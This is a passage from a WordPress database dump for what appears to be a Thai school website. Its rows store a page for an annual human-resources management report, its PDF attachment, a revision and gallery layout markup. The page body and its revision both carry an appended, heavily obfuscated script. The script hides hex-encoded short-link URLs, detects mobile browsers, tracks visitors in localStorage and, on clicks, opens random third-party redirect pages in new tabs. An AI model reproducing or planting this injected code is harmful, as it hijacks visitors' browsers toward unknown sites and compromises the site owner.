\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี','','publish','closed','closed','','%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9c%e0%b8%a5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%ab%e0%b8%b2%e0%b8%a3%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b8%9e%e0%b8%b1','','','2024-09-02 11:18:29','2024-09-02 04:18:29','',0,'http://pakhaeng.ssk.in.th/?page_id=1003',0,'page','',0),
(1004,1,'2024-08-20 19:36:49','2024-08-20 12:36:49','','รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี','','inherit','','closed','','%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9c%e0%b8%a5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%ab%e0%b8%b2%e0%b8%a3%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b8%9e%e0%b8%b1','','','2024-08-20 19:36:49','2024-08-20 12:36:49','',1003,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี.pdf',0,'attachment','application/pdf',0),
(1005,1,'2024-08-20 19:36:56','2024-08-20 12:36:56','<!-- wp:file {\"id\":1004,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี\"></object><a id=\"wp-block-file--media-f50dda28-d498-4c6b-9e49-cf758e185389\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี.pdf\">รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-f50dda28-d498-4c6b-9e49-cf758e185389\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี','','inherit','closed','closed','','1003-revision-v1','','','2024-08-20 19:36:56','2024-08-20 12:36:56','',1003,'http://pakhaeng.ssk.in.th/?p=1005',0,'revision','',0),
(1006,1,'2024-08-20 19:37:12','2024-08-20 12:37:12','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.a